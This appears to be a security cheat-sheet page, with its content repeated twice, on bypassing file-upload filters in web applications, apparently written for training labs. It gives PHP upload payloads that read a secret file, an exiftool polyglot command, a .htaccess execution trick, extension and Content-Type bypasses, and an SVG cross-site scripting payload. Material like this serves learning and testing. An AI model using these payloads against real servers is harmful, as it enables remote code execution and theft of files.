File Upload

Upload the file name and include obfuscated path traversal ..%2fexploit.php and retrieve the content GET /files/avatars/..%2fexploit.php.
Upload a file named, exploit.php%00.jpg with trailing null byte character and get the file execution at /files/avatars/exploit.php.
Create polygot using valid image file, by running the command in bash terminal: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php. Once polygot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php , and search the response content for the phrase START to obtain the sensitive data.
Upload two different files. First upload .htaccess with Content-Type: text/plain, and the file data value set to AddType application/x-httpd-php .l33t. This will allow the upload and execute of second file upload named, exploit.l33t with extension l33t.
MIME type image/jpeg or image/png is only allowed. Bypass the filter by specifying Content-Type to value of image/jpeg and then uploading exploit.php file.
If target allow (RFI), upload from remote URL, then host and exploit file with the following GIF magic bytes: GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>. The file name on exploit server could read image.php%00.gif.
Double file extension bypass filter exploit.csv.php.

File extension bypass:

Extension with varied capitalization, such as .sVG
Double extension, such as .jpg.svg or .svg.jpg
Extension with a delimiter, such as %0a, %09, %0d, %00, #. Other examples, file.png%00.svg or file.png\x0d\x0a.svg
Empty filename, .svg
Try to cut allowed extension with more than the maximum filename length.

XSS when svg upload

Uploading of SVG file that contains JavaScript that performs cross site scripting attack.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>

PreviousPath Traversal NextInsecure Desarialization

Last updated 8 months ago

Upload the file name and include obfuscated path traversal ..%2fexploit.php and retrieve the content GET /files/avatars/..%2fexploit.php.
Upload a file named, exploit.php%00.jpg with trailing null byte character and get the file execution at /files/avatars/exploit.php.
Create polygot using valid image file, by running the command in bash terminal: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php. Once polygot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php , and search the response content for the phrase START to obtain the sensitive data.
Upload two different files. First upload .htaccess with Content-Type: text/plain, and the file data value set to AddType application/x-httpd-php .l33t. This will allow the upload and execute of second file upload named, exploit.l33t with extension l33t.
MIME type image/jpeg or image/png is only allowed. Bypass the filter by specifying Content-Type to value of image/jpeg and then uploading exploit.php file.
If target allow (RFI), upload from remote URL, then host and exploit file with the following GIF magic bytes: GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>. The file name on exploit server could read image.php%00.gif.
Double file extension bypass filter exploit.csv.php.

File extension bypass:

Extension with varied capitalization, such as .sVG
Double extension, such as .jpg.svg or .svg.jpg
Extension with a delimiter, such as %0a, %09, %0d, %00, #. Other examples, file.png%00.svg or file.png\x0d\x0a.svg
Empty filename, .svg
Try to cut allowed extension with more than the maximum filename length.

XSS when svg upload

Uploading of SVG file that contains JavaScript that performs cross site scripting attack.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>